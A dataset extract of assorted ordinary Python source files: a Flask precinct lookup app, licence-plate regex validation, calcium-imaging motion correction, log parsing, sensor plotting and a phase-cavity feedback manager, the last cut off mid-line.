+{"seq_id":"383461832","text":"from flask import Flask\nfrom flask_jsglue import JSGlue\nfrom controllers.home import home\nfrom controllers.models import models\nfrom controllers.signin import signin\nfrom controllers.emailer import emailer\n\napp = Flask(__name__)\njsglue = JSGlue(app)\napp.register_blueprint(home)\napp.register_blueprint(models)\napp.register_blueprint(signin)\napp.register_blueprint(emailer)\n\n\n@app.route('/wplookup', methods=['GET', 'POST'])\ndef ward_precinct_lookup():\n from flask import request\n\n if request.method == 'GET':\n from flask import render_template\n\n sql = \"SELECT DISTINCT street_type FROM ward_precinct ORDER BY street_type\"\n cursor = the_dataset.cxn.cursor()\n cursor.execute(sql)\n rex = cursor.fetchall()\n types = [r[0] for r in rex]\n types[0] = \"None\"\n\n sql = (\"SELECT name, type, code FROM jurisdictions WHERE county_code=81 \"\n \"ORDER BY name\")\n cursor = the_dataset.cxn.cursor()\n cursor.execute(sql)\n rex = cursor.fetchall()\n jurisdictions = [{'id': r[2], 'value': r[0] + ' ' + r[1]} for r in rex]\n\n return render_template(\n \"ward_precinct.html\",\n types=types,\n jurisdictions=jurisdictions\n )\n else:\n from flask import jsonify\n from db_utils.precinct_finder import block_typer, Address\n\n prefix = request.form['street_prefix']\n if prefix == '0':\n prefix = ''\n suffix = request.form['street_suffix']\n if suffix == '0':\n suffix = ''\n\n address = Address(\n number=request.form['street_number'],\n prefix=prefix,\n street=request.form['street_name'],\n type=request.form['street_type'],\n suffix=suffix\n )\n jcode = request.form['jurisdiction']\n\n address_is_even = (int(address.number) % 2 == 0)\n btype = block_typer(the_dataset.cxn, jcode, address)\n if btype[0] == btype[1]:\n result = btype[0]\n elif btype[0] and address_is_even:\n result = btype[0]\n elif btype[1] and not address_is_even:\n result = btype[1]\n else:\n result = \"Human lookup required\"\n\n return jsonify(result)\n\n\nif __name__ == '__main__':\n import os\n from models.dataset import the_dataset\n\n app_path = os.path.dirname(__file__)\n the_dataset.open(app_path)\n # the_dataset.load()\n\n app.run(host='0.0.0.0')\n","sub_path":"adlaiweb.py","file_name":"adlaiweb.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"244197867","text":"import os\n\nimport mojimoji\nfrom pyknp import Juman\n\njumanpp = Juman()\n\nsentences = []\nwith open('calendar.txt') as f:\n for line in f:\n result = jumanpp.analysis(mojimoji.han_to_zen(line.rstrip()))\n sentence = ' '.join(mrph.midasi for mrph in result.mrph_list())\n sentences.append(sentence)\n\nwith open(os.path.join('SST-2', 'test.tsv'), 'w') as f:\n f.write('index\\tsentence\\n')\n for index, sentence in enumerate(sentences):\n f.write(str(index) + '\\t' + sentence + '\\n')\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"561740421","text":"# -*- coding: utf-8 -*-\nimport re\n# Military plate license\n# AA | 12-34\n# prefix | suffix\nmilitary_prefix = ['AA', 'AB', 'AC', 'AD', 'AV', 'AT', 'AN', 'AP',\n 'BBB', 'BC', 'BH', 'BK', 'BL', 'BT', 'BP', 'BS', 'BV',\n 'HA', 'HB', 'HC', 'HD', 'HE', 'HT', 'HQ', 'HN', 'HH',\n 'KA', 'KB', 'KC', 'KD', 'KV', 'KP', 'KK', 'KT', 'KN',\n 'PA', 'PP', 'PM', 'PK', 'PT', 'PY', 'PQ', 'PX', 'PC', 'HL',\n 'QA', 'QB', 'QH',\n 'TC', 'TH', 'TK', 'TT', 'TM', 'TN', 'DB', 'ND', 'CH', 'VB', 'VK', 'CV', 'CA', 'CP', 'CM', 'CC',\n 'VT', 'CB']\n\n# Civil plate license\n# 26 | LD | 88678\n# prefix | postfix | suffix\ncivil_prefix = range(10, 100) # 10, 11, ..., 99\nspecial_postfix = ['LD', 'DA', 'R', 'T', 'MK', 'CD']\n\n# Biển số xe 50cc\n# XX-xx / XXX.XX\n# seri biển số sử dụng lần lượt một trong 20 chữ cái sau đây: A, B, C, D, E, F, G, H, K, L, M, N, P, S, T, U, V, X, Y, Z kết hợp với một trong các chữ cái sau: A, B, C, D, E, F, H, K, L, M, N, P, R, S, T, U, V, X, Y, Z\nregex_50cc_moto = '^[1-9][0-9][ABCDEFGHKLMNPSTUVXYZ][ABCDEFHKLMNPRSTUVXYZ][0-9]{4,5}$'\n\n# Biển số xe 100cc - 150cc\n# XX-Xn / XXX.XX\n# seri biển số sử dụng một trong 19 chữ cái B, C, D, E, F, G, H, K, L, M, N, P, S, T, U, V, X, Y, Z kết hợp với một chữ số tự nhiên từ 1 đến 9\nregex_100cc_moto = '^[1-9][0-9][BCDEFGHKLMNPSTUVXYZ][1-9][0-9]{4,5}$'\n\n# Biển số xe Phân khối lớn\n# XX-Xn / XXX.XX\n# seri sử dụng chữ cái A kết hợp với 1 chữ s��� tự nhiên từ 1 đến 9\nregex_powerful_moto = '^[1-9][0-9]A[1-9][0-9]{4,5}$'\n\n# Biển số xe Ô tô - tải\n# XXn/nn- - XXX.XX\n# sêri biển số sử dụng lần lượt một trong 20 chữ cái sau đây: A, B, C, D, E, F, G, H, K, L, M, N, P, S, T, U, V, X, Y, Z\nregex_oto = '^[1-9][0-9][ABCDEFGHKLMNPSTUVXYZ][0-9]{4,5}$'\n\n# Biển số đặc biệt\nregex_specical = '^[1-9][0-9](LD|DA|R|T|MK|CD|T#)[0-9]{4,5}$'\n\n# Military plate license\n# AA | 12-34\n# prefix | suffix\nregex_military = '^(AA|AB|AC|AD|AV|AT|AN|AP|BBB|BC|BH|BK|BL|BT|BP|BS|BV|HA|HB|HC|HD|HE|HT|HQ|HN|HH|\\\n KA|KB|KC|KD|KV|KP|KK|KT|KN|PA|PP|PM|PK|PT|PY|PQ|PX|PC|HL|QA|QB|QH|TC|TH|TK|TT|\\\n TM|TN|DB|ND|CH|VB|VK|CV|CA|CP|CM|CC|VT|CB)[0-9]{4}$'\n\n \n# Electric motorbike\n# XX-MĐx / XXX.XX\n#regex_electric_moto = r'^[1-9][0-9]M[#D][1-9][0-9]{4,5}$'\nregex_electric_moto = r'^[1-9][0-9]M[#D][1-9][0-9]{5}$'\n\n# Biển số tạm thời\nregex_temp = r'^T[1-9][0-9][0-9]{4,5}$'\n\n# Foreign plate license\n# 41-291-NG-01\nregex_foreign = r'^[1-9][0-9][0-9]{3}(NN|NG|CV|QT)[0-9]{2}$'\n\npattern_general_list = [regex_electric_moto, regex_military, regex_specical, regex_powerful_moto, regex_100cc_moto, regex_50cc_moto, regex_temp, regex_foreign, regex_oto]\n\npattern_car_list = [None, regex_military, regex_specical, None, None, None, regex_temp, regex_foreign, regex_oto]\n\ndef matching_plate(plate, label=None):\n if label is None:\n pattern_list = pattern_general_list\n elif label == 'car' or label == 'van' or label == 'truck':\n pattern_list = pattern_car_list\n \n for i in range(len(pattern_list)):\n pattern = pattern_list[i]\n if pattern is not None:\n prog = re.compile(pattern)\n result = prog.match(plate)\n #print(pattern, result, plate)\n if result is not None:\n return i\n return -1\n \ndef postprocess(plate, probs):\n thresh = 0.6\n plate = list(plate)\n \n if len(plate) <= 5:\n return \"\"\n num_alpha = 0\n for c in plate:\n if c.isalpha() or c == '#':\n num_alpha += 1\n\n# if num_alpha == 0:\n# if plate[2] == '6':\n# plate[2] = 'G'\n# elif plate[2] == '8':\n# plate[2] = 'B'\n# elif plate[2] == '2':\n# plate[2] = 'Z'\n# elif plate[2] == '0':\n# plate[2] = 'D'\n \n \n plate = ''.join(plate)\n #print(plate, probs)\n for i in range(len(plate)):\n if probs[i] < thresh:\n return \"\"\n pattern_index = matching_plate(plate)\n if pattern_index == -1:\n return \"\"\n else:\n return plate\n \nif __name__ == '__main__':\n #Biển số xe 50cc\n plate_test_0 = {\"26AA0021\": 'T', \"26AA00212\": 'T', \"26AO00212\": 'F', \"26AB002125\": 'F', \"26AB002\": 'F', \"6AB0021\": 'F'}\n for plate in plate_test_0.keys():\n pattern_index = matching_plate(plate)\n if pattern_index == -1:\n result = \"F\"\n else:\n result = \"T\"\n if result != plate_test_0[plate]:\n print(\"Test {} is failed.\".format(plate))\n # Biển số xe 100cc - 150cc\n plate_test_1 = {\"26B10034\": 'T', \"26B100345\": 'T'}\n for plate in plate_test_1.keys():\n pattern_index = matching_plate(plate)\n if pattern_index == -1:\n result = \"F\"\n else:\n result = \"T\"\n if result != plate_test_1[plate]:\n print(\"Test {} is failed.\".format(plate), pattern_index)\n","sub_path":"ocr_plate_model/attention_ocr/postprocess.py","file_name":"postprocess.py","file_ext":"py","file_size_in_byte":5131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"206246283","text":"\"\"\"This is the entry point of the program.\"\"\"\n\n\ndef create_box(height, width, character):\n across = width * character\n grid = \"\"\n\n for i in range(height):\n grid += across\n grid += '\\n'\n return grid\n\nif __name__ == '__main__':\n create_box(3, 4, '*')\n","sub_path":"create_box/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"19992376","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2017-06-29 15:58:33\n# @Author : Your Name (you@example.org)\n# @Link : http://example.org\n# @Version : $Id$\nfrom __future__ import print_function\nimport os\nimport time\nfrom collections import defaultdict\ntry:\n import ujson as json\nexcept ImportError:\n import json\n\nLOG_LIST = (\n 'gateway.log',\n 'account.log',\n 'game.log',\n 'im.log',\n 'battle.log',\n 'login.log',\n)\n\nPATH = '../log/debug/gateway.log'\nDATE_FMT = '%Y-%m-%d %H:%M:%S%z'\n\ndef filter_input_log(path):\n '''读取日志, 过滤数据'''\n ret = defaultdict(list)\n with open(path, 'r', encoding='utf8', errors='ignore') as f:\n for line in f:\n text = line.split(' ')\n if len(text) <= 5 or text[3] not in {'handle', 'func', 'section'}:\n continue\n ts = \" \".join(text[:2])\n ts = time.mktime(time.strptime(ts, DATE_FMT))\n name, cost = text[4:6]\n cost = cost.strip('\\n')\n record = (ts, name, cost)\n ret[text[3]].append(record)\n return ret\n\ndef each_log():\n '''遍历所有日志'''\n ret = {}\n for log_file in LOG_LIST:\n path = '../log/debug/%s' % log_file\n try:\n server = os.path.splitext(log_file)[0]\n ret[server] = filter_input_log(path)\n except Exception:\n print(path)\n import traceback\n traceback.print_exc()\n return ret\n\n\ndef main():\n ret = each_log()\n with open('parse_result.json', 'w') as f:\n json.dump(ret, f)\n print ('over.')\n\nif __name__ == '__main__':\n main() ","sub_path":"parse_log.py","file_name":"parse_log.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"10361430","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Sebastian,Casper,Melisa,Morgane\n\"\"\"\n\nimport datetime\nimport logging\nimport os\nimport pickle\n\nimport src.configuration\n\nimport caiman as cm\nimport numpy as np\nfrom caiman.motion_correction import MotionCorrect\nfrom caiman.source_extraction.cnmf import params as params\n\nfrom src.Database.database_connection import database\n\ncursor = database.cursor()\n\n\ndef run_motion_correction(cropping_file, dview):\n \"\"\"\n This is the function for motion correction. Its goal is to take in a decoded and\n cropped .tif file, perform motion correction, and save the result as a .mmap file.\n\n This function is only runnable on the cn76 server because it requires parallel processing.\n\n Args:\n cropping_file: tif file after cropping\n dview: cluster\n\n Returns:\n row: pd.DataFrame object\n The row corresponding to the motion corrected analysis state.\n \"\"\"\n # Get output file paths\n\n data_dir = os.environ['DATA_DIR_LOCAL'] + 'data/interim/motion_correction/'\n sql = \"SELECT mouse,session,trial,is_rest,decoding_v,cropping_v,motion_correction_v,input,home_path,decoding_main FROM Analysis WHERE cropping_main=? ORDER BY motion_correction_v\"\n val = [cropping_file, ]\n cursor.execute(sql, val)\n result = cursor.fetchall()\n data = []\n inter = []\n for x in result:\n inter = x\n for y in inter:\n data.append(y)\n\n # Update the database\n\n if data[6] == 0:\n data[6] = 1\n file_name = f\"mouse_{data[0]}_session_{data[1]}_trial_{data[2]}.{data[3]}.v{data[4]}.{data[5]}.{data[6]}\"\n output_meta_pkl_file_path = f'meta/metrics/{file_name}.pkl'\n sql1 = \"UPDATE Analysis SET motion_correction_meta=?,motion_correction_v=? WHERE cropping_main=? \"\n val1 = [output_meta_pkl_file_path, data[6], cropping_file]\n cursor.execute(sql1, val1)\n\n else:\n data[6] += 1\n file_name = f\"mouse_{data[0]}_session_{data[1]}_trial_{data[2]}.{data[3]}.v{data[4]}.{data[5]}.{data[6]}\"\n output_meta_pkl_file_path = f'meta/metrics/{file_name}.pkl'\n sql2 = \"INSERT INTO Analysis (motion_correction_meta,motion_correction_v) VALUES (?,?)\"\n val2 = [output_meta_pkl_file_path, data[6]]\n cursor.execute(sql2, val2)\n database.commit()\n sql3 = \"UPDATE Analysis SET decoding_main=?,decoding_v=?,mouse=?,session=?,trial=?,is_rest=?,input=?,home_path=?,cropping_v=?,cropping_main=? WHERE motion_correction_meta=? AND motion_correction_v=?\"\n val3 = [data[9], data[4], data[0], data[1], data[2], data[3], data[7], data[8], data[5], cropping_file,\n output_meta_pkl_file_path, data[6]]\n cursor.execute(sql3, val3)\n database.commit()\n output_meta_pkl_file_path_full = data_dir + output_meta_pkl_file_path\n\n # Calculate movie minimum to subtract from movie\n cropping_file_full = os.environ['DATA_DIR_LOCAL'] + cropping_file\n min_mov = np.min(cm.load(cropping_file_full))\n\n # Apply the parameters to the CaImAn algorithm\n\n sql5 = \"SELECT motion_correct,pw_rigid,save_movie_rig,gSig_filt,max_shifts,niter_rig,strides,overlaps,upsample_factor_grid,num_frames_split,max_deviation_rigid,shifts_opencv,use_conda,nonneg_movie, border_nan FROM Analysis WHERE cropping_main=? \"\n val5 = [cropping_file, ]\n cursor.execute(sql5, val5)\n myresult = cursor.fetchall()\n para = []\n aux = []\n for x in myresult:\n aux = x\n for y in aux:\n para.append(y)\n parameters = {'motion_correct': para[0], 'pw_rigid': para[1], 'save_movie_rig': para[2],\n 'gSig_filt': (para[3], para[3]), 'max_shifts': (para[4], para[4]), 'niter_rig': para[5],\n 'strides': (para[6], para[6]),\n 'overlaps': (para[7], para[7]), 'upsample_factor_grid': para[8], 'num_frames_split': para[9],\n 'max_deviation_rigid': para[10],\n 'shifts_opencv': para[11], 'use_cuda': para[12], 'nonneg_movie': para[13],\n 'border_nan': para[14]}\n caiman_parameters = parameters.copy()\n caiman_parameters['min_mov'] = min_mov\n opts = params.CNMFParams(params_dict=caiman_parameters)\n\n # Rigid motion correction (in both cases)\n\n logging.info('Performing rigid motion correction')\n t0 = datetime.datetime.today()\n\n # Create a MotionCorrect object\n\n mc = MotionCorrect([cropping_file_full], dview=dview, **opts.get_group('motion'))\n\n # Perform rigid motion correction\n\n mc.motion_correct_rigid(save_movie=parameters['save_movie_rig'], template=None)\n dt = int((datetime.datetime.today() - t0).seconds / 60) # timedelta in minutes\n logging.info(f' Rigid motion correction finished. dt = {dt} min')\n\n # Obtain template, rigid shifts and border pixels\n\n total_template_rig = mc.total_template_rig\n shifts_rig = mc.shifts_rig\n\n # Save template, rigid shifts and border pixels in a dictionary\n\n meta_pkl_dict = {\n 'rigid': {\n 'template': total_template_rig,\n 'shifts': shifts_rig,\n }\n }\n sql = \"UPDATE Analysis SET duration_rigid=? WHERE motion_correction_meta=? AND motion_correction_v=? \"\n val = [dt, output_meta_pkl_file_path, data[6]]\n cursor.execute(sql, val)\n\n if parameters['save_movie_rig'] == 1:\n # Load the movie saved by CaImAn, which is in the wrong\n # directory and is not yet cropped\n\n logging.info(f' Loading rigid movie for cropping')\n m_rig = cm.load(mc.fname_tot_rig[0])\n logging.info(f' Loaded rigid movie for cropping')\n\n # Get the cropping points determined by the maximal rigid shifts\n\n x_, _x, y_, _y = get_crop_from_rigid_shifts(shifts_rig)\n\n # Crop the movie\n\n logging.info(f' Cropping and saving rigid movie with cropping points: [x_, _x, y_, _y] = {[x_, _x, y_, _y]}')\n m_rig = m_rig.crop(x_, _x, y_, _y, 0, 0)\n meta_pkl_dict['rigid']['cropping_points'] = [x_, _x, y_, _y]\n sql = \"UPDATE Analysis SET motion_correction_cropping_points_x1=?,motion_correction_cropping_points_x2=?,motion_correction_cropping_points_y1=?,motion_correction_cropping_points_y2=? WHERE motion_correction_meta=? AND motion_correction_v=? \"\n val = [x_, _x, y_, _y, output_meta_pkl_file_path, data[6]]\n cursor.execute(sql, val)\n\n # Save the movie\n\n rig_role = 'alternate' if parameters['pw_rigid'] else 'main'\n fname_tot_rig = m_rig.save(data_dir + rig_role + '/' + file_name + '_rig' + '.mmap', order='C')\n logging.info(f' Cropped and saved rigid movie as {fname_tot_rig}')\n\n # Remove the remaining non-cropped movie\n\n os.remove(mc.fname_tot_rig[0])\n\n sql = \"UPDATE Analysis SET motion_correction_rig_role=? WHERE motion_correction_meta=? AND motion_correction_v=? \"\n val = [fname_tot_rig, output_meta_pkl_file_path, data[6]]\n cursor.execute(sql, val)\n database.commit()\n\n # If specified in the parameters, apply piecewise-rigid motion correction\n if parameters['pw_rigid'] == 1:\n logging.info(f' Performing piecewise-rigid motion correction')\n t0 = datetime.datetime.today()\n # Perform non-rigid (piecewise rigid) motion correction. Use the rigid result as a template.\n mc.motion_correct_pwrigid(save_movie=True, template=total_template_rig)\n # Obtain template and filename\n total_template_els = mc.total_template_els\n fname_tot_els = mc.fname_tot_els[0]\n\n dt = int((datetime.datetime.today() - t0).seconds / 60) # timedelta in minutes\n meta_pkl_dict['pw_rigid'] = {\n 'template': total_template_els,\n 'x_shifts': mc.x_shifts_els,\n 'y_shifts': mc.y_shifts_els # removed them initially because they take up space probably\n }\n\n logging.info(f' Piecewise-rigid motion correction finished. dt = {dt} min')\n\n # Load the movie saved by CaImAn, which is in the wrong\n # directory and is not yet cropped\n\n logging.info(f' Loading pw-rigid movie for cropping')\n m_els = cm.load(fname_tot_els)\n logging.info(f' Loaded pw-rigid movie for cropping')\n\n # Get the cropping points determined by the maximal rigid shifts\n\n x_, _x, y_, _y = get_crop_from_pw_rigid_shifts(np.array(mc.x_shifts_els),\n np.array(mc.y_shifts_els))\n # Crop the movie\n\n logging.info(f' Cropping and saving pw-rigid movie with cropping points: [x_, _x, y_, _y] = {[x_, _x, y_, _y]}')\n m_els = m_els.crop(x_, _x, y_, _y, 0, 0)\n meta_pkl_dict['pw_rigid']['cropping_points'] = [x_, _x, y_, _y]\n\n # Save the movie\n\n fname_tot_els = m_els.save(data_dir + 'main/' + file_name + '_els' + '.mmap', order='C')\n logging.info(f'Cropped and saved rigid movie as {fname_tot_els}')\n\n # Remove the remaining non-cropped movie\n\n os.remove(mc.fname_tot_els[0])\n\n sql = \"UPDATE Analysis SET motion_correction_main=?, motion_correction_cropping_points_x1=?,motion_correction_cropping_points_x2=?,motion_correction_cropping_points_y1=?,motion_correction_cropping_points_y2=?,duration_pw_rigid=? WHERE motion_correction_meta=? AND motion_correction_v=? \"\n val = [fname_tot_els, x_, _x, y_, _y, dt, output_meta_pkl_file_path, data[6]]\n cursor.execute(sql, val)\n database.commit()\n\n # Write meta results dictionary to the pkl file\n\n\n pkl_file = open(output_meta_pkl_file_path_full, 'wb')\n pickle.dump(meta_pkl_dict, pkl_file)\n pkl_file.close()\n\n return fname_tot_els, data[6]\n\n\ndef get_crop_from_rigid_shifts(shifts_rig):\n x_ = int(round(abs(np.array(shifts_rig)[:, 1].max()) if np.array(shifts_rig)[:, 1].max() > 0 else 0))\n _x = int(round(abs(np.array(shifts_rig)[:, 1].min()) if np.array(shifts_rig)[:, 1].min() < 0 else 0))\n y_ = int(round(abs(np.array(shifts_rig)[:, 0].max()) if np.array(shifts_rig)[:, 0].max() > 0 else 0))\n _y = int(round(abs(np.array(shifts_rig)[:, 0].min()) if np.array(shifts_rig)[:, 0].min() < 0 else 0))\n return x_, _x, y_, _y\n\n\ndef get_crop_from_pw_rigid_shifts(x_shifts_els, y_shifts_els):\n x_ = int(round(abs(x_shifts_els.max()) if x_shifts_els.max() > 0 else 0))\n _x = int(round(abs(x_shifts_els.min()) if x_shifts_els.min() < 0 else 0))\n y_ = int(round(abs(y_shifts_els.max()) if y_shifts_els.max() > 0 else 0))\n _y = int(round(abs(x_shifts_els.min()) if x_shifts_els.min() < 0 else 0))\n return x_, _x, y_, _y\n","sub_path":"src/Steps/motion_correction.py","file_name":"motion_correction.py","file_ext":"py","file_size_in_byte":10486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"408184083","text":"import matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport numpy as np\n\ntime = []\nfrontRightPot = []\nbackRightPot = []\nsteeringPot = []\nFx = []\nFy = []\nFz = []\nMx = []\nMy = []\nMz = []\n\ndata = [time, frontRightPot, backRightPot, steeringPot, Fx, Fy, Fz, Mx, My, Mz]\nhead = []\n\nfileName = \"output.csv\"\nMIN_TIME = 0\nMAX_TIME = 6000\nrunNum = 0\n\n\nwith open(fileName, \"r\") as f:\n\tlines = f.readlines()\n\ntime_el = (int(lines[len(lines)-1].split(\";\")[0]) - int(lines[1].split(\";\")[0]))//1000000\nmin_capture_time = int(lines[1].split(\";\")[0])\n\nprint(\"Reading data from file... \")\n\nfor j in range(0, len(lines), 1):\n\tline = lines[j].split(\";\")\n\tif line[0] != \"Time\":\n\t\tif ((min_capture_time+(MIN_TIME*1000000)) < int(line[0]) < (min_capture_time+(MAX_TIME*1000000))):\n\t\t\tfor i in range(len(data)):\n\t\t\t\tif i == 0:\n\t\t\t\t\tdata[i].append((int(line[i])-min_capture_time)/1000000)\n\t\t\t\telse:\n\t\t\t\t\tdata[i].append(int(line[i]))\n\telse:\n\t\tfor i in range(len(data)):\n\t\t\thead.append(line[i])\n\n\nprint(\"\\tFile reading finished with {0} rows of data collected.\".format(len(data[0])))\n\nSMALL_SIZE = 5\nMEDIUM_SIZE = 10\nBIGGER_SIZE = 16\ncolors = (\"red\", \"green\", \"blue\")\nnames = (\"Pots\", \"Forces\", \"Moments\")\nmaxs = [0, 0, 0]\nmins = [1023, 1023, 1023]\nplt.rc('font', size=SMALL_SIZE) # controls default text sizes\nplt.rc('axes', titlesize=BIGGER_SIZE) # fontsize of the axes title\nplt.rc('axes', labelsize=MEDIUM_SIZE) # fontsize of the x and y labels\nplt.rc('xtick', labelsize=MEDIUM_SIZE) # fontsize of the tick labels\nplt.rc('ytick', labelsize=MEDIUM_SIZE) # fontsize of the tick labels\nplt.rc('legend', fontsize=SMALL_SIZE) # legend fontsize\nplt.rc('figure', titlesize=BIGGER_SIZE)\n\n\nplt.figure(num=None, figsize=(20, 6), dpi=100, facecolor='w', edgecolor='k')\nprint(\"Creating figures...\")\nfor x in range(3):\n for i in range(3 * x + 1, 3 * x + 4):\n idata = [int(x) for x in data[i]]\n if(min(idata) < mins[x]):\n mins[x] = min(idata)\n if(max(idata) > maxs[x]):\n maxs[x] = max(idata)\n \n\n\nfor x in range(3):\n linesL = []\n\n plt.clf()\n print(\"\\t -creating figure for Time vs {0}\".format(names[x]))\n for i in range(3 * x + 1, 3 * x + 4):\n\n area = 1\n idata = [int(x) for x in data[i]]\n plt.yticks(np.arange(mins[x], maxs[x] + 1, max(int((maxs[x] - mins[x]) / 10), 1)))\n\n plt.scatter(data[0], data[i], c=colors[i%3], s=area, alpha=0.9, label=head[i])\n plt.title(\"{0} by Time\".format(names[x]))\n plt.ylabel(\"Reading (ohms)\")\n plt.xlabel(\"Time (seconds)\")\n plt.savefig(\"{0}_{1}.png\".format(runNum, names[x]))\n","sub_path":"longDataPlot.py","file_name":"longDataPlot.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"262806272","text":"\n\nfrom xai.brain.wordbase.nouns._sheikh import _SHEIKH\n\n#calss header\nclass _SHEIKHS(_SHEIKH, ):\n\tdef __init__(self,): \n\t\t_SHEIKH.__init__(self)\n\t\tself.name = \"SHEIKHS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"sheikh\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_sheikhs.py","file_name":"_sheikhs.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"387770604","text":"#fs_Manager.py\n\"\"\" Manager for to tie pcav measurements to cable stabilizer and fiber oven. \n\nThis script, and class, implement a simplified version of the control process\nthat takes the pcav measurements, averages them, and sends drift corrections to\nthe cable stabilizer system. The fiber oven then corrects for the change in the\ncable stabilizer phase.\n\nDependencies:\n- numpy\n- matplotlib\n- scipy\n- watchdog3\n- epics (pyepics)\n\n\"\"\"\n\nimport time\nfrom numpy import *\nfrom matplotlib import *\nfrom scipy import signal\nimport watchdog3\n#from psp.Pv import Pv # uncomment for older compatibility\nimport epics\nimport sys\nimport random\nimport argparse\nfrom collections import deque\nimport asyncio\nimport json\nimport pdb\n\nclass fs_manager():\n \"\"\"Manages pcav feedback to cable stabilizer, monitors fiber oven.\"\"\"\n def __init__(self,debug=False,sim=False):\n self.debug = debug\n self.sim = sim\n self.config = config(debug=self.debug,sim=self.sim)\n self.config.loadConfig()\n self.pcavdata = []\n for ii in range(0,4):\n self.pcavdata.append(deque([],maxlen=50)) # these vectors hold the recent pcav data for filtering\n self.pcavproc = numpy.zeros(4) # the processed output of the signal processing\n self.soscoeff = signal.iirdesign(wp=0.3,ws=0.5,gpass=0.1,gstop=40.0,output='sos') # basic elliptic low pass\n self.phoffset = {\"hxr\":0.0,\"sxr\":0.0}\n self.flywheelcomplete = False\n self.hxrfeedbackenabled = False\n self.sxrfeedbackenabled = False\n self.hxrgain = 0.0\n self.sxrgain = 0.0\n\n async def fssleep(self):\n await asyncio.sleep(1.0)\n\n async def updateCablePhaseShifters(self):\n \"\"\" Write new values to the phase shifters based on the processed data\n and what is enabled (enabled: TODO).\"\"\"\n if self.flywheelcomplete:\n await self.loadCabStabGains()\n if self.hxrfeedbackenabled:\n hxrcorrection = (numpy.mean([self.pcavproc[0],self.pcavproc[1]])- self.phoffset[\"hxr\"])*1.0e-12*360.0*476.0e6*self.hxrgain\n self.writeCablePhaseShifter(beamline=\"hxr\",value=hxrcorrection)\n if self.sxrfeedbackenabled:\n sxrcorrection = (numpy.mean([self.pcavproc[2],self.pcavproc[3]])- self.phoffset[\"sxr\"])*1.0e-12*360.0*476.0e6*self.sxrgain\n self.writeCablePhaseShifter(beamline=\"sxr\",value=sxrcorrection)\n return 0\n\n def writeCablePhaseShifter(self, beamline, value):\n \"\"\" Write a correction term to the selected cable stabilizer.\"\"\"\n if not self.debug:\n if beamline==\"hxr\":\n ref_feh_phase = self.config.pvs[\"fehFBOffset\"].get()\n self.config.pvs[\"fehphaseshifterPV\"].put(value+ref_feh_phase)\n elif beamline==\"sxr\":\n ref_neh_phase = self.config.pvs[\"nehFBOffset\"].get()\n self.config.pvs[\"nehphaseshifterPV\"].put(value+ref_neh_phase)\n else:\n if beamline==\"hxr\":\n print(\"fehphase would write: %E\" % value)\n elif beamline==\"sxr\":\n print(\"nehphase would write: %E\" % value)\n return 0\n \n async def updatePcavValues(self):\n \"\"\" Grab new phase cavity values and update the feedbacks.\n\n This is the primary feedback function for this system. We lowpass filter the pcav data for each beamline, and wrap a simple\n feedback around the average.\n \"\"\"\n self.pcavdata[0].append(self.config.pvs[\"pcav1PV\"].get())\n self.pcavdata[1].append(self.config.pvs[\"pcav2PV\"].get())\n self.pcavdata[2].append(self.config.pvs[\"pcav3PV\"].get())\n self.pcavdata[3].append(self.config.pvs[\"pcav4PV\"].get())\n self.pcavproc[0] = numpy.mean(signal.sosfilt(self.soscoeff,self.pcavdata[0]))\n self.pcavproc[1] = numpy.mean(signal.sosfilt(self.soscoeff,self.pcavdata[1]))\n self.pcavproc[2] = numpy.mean(signal.sosfilt(self.soscoeff,self.pcavdata[2]))\n self.pcavproc[3] = numpy.mean(signal.sosfilt(self.soscoeff,self.pcavdata[3]))\n if self.pcavdata[0].__len__() > 49 and not self.flywheelcomplete:\n self.flywheelcomplete = True\n await self.updateCablePhaseShifters()\n return 0\n \n\n async def disableFeedbackForBeamline(self, beamline):\n \"\"\" Turn off cable stabilizer feedbacks for beamline.\n \"\"\"\n if beamline == \"hxr\":\n self.hxrfeedbackenabled = False\n self.config.pvs[\"fehFBEnable\"].put(0)\n elif beamline == \"sxr\":\n self.sxrfeedbackenabled = False\n self.config.pvs[\"nehFBEnable\"].put(0)\n return 0\n\n async def enableFeedbackForBeamline(self,beamline):\n \"\"\" Turn on cable stabilizer feedbacks for beamline.\n \"\"\"\n if beamline == \"hxr\":\n self.hxrfeedbackenabled = True\n self.config.pvs[\"fehFBEnable\"].put(1)\n elif beamline == \"sxr\":\n self.sxrfeedbackenabled = True\n self.config.pvs[\"nehFBEnable\"].put(1)\n\n async def loadPreviousPcavValue(self,pcavdeque):\n \"\"\" Manage cases of a restart of various components of the system.\n\n Not yet implemented.\n \"\"\"\n pass\n\n async def zeroPcavOffsets(self):\n \"\"\" Write current offsets to center both cable stabilizers at current position\"\"\"\n await self.zeroPcavOffsetForBeamline('hxr')\n await self.zeroPcavOffsetForBeamline('sxr')\n return 0\n\n async def zeroPcavOffsetForBeamline(self,beamline):\n \"\"\" Write current offsets to center the cable stabilizer for a\n beamline.\"\"\"\n if self.debug:\n print(\"zeroing pcav offsets for %s\" % beamline.upper())\n if beamline==\"hxr\":\n self.phoffset[\"hxr\"]= self.phoffset[\"hxr\"] + 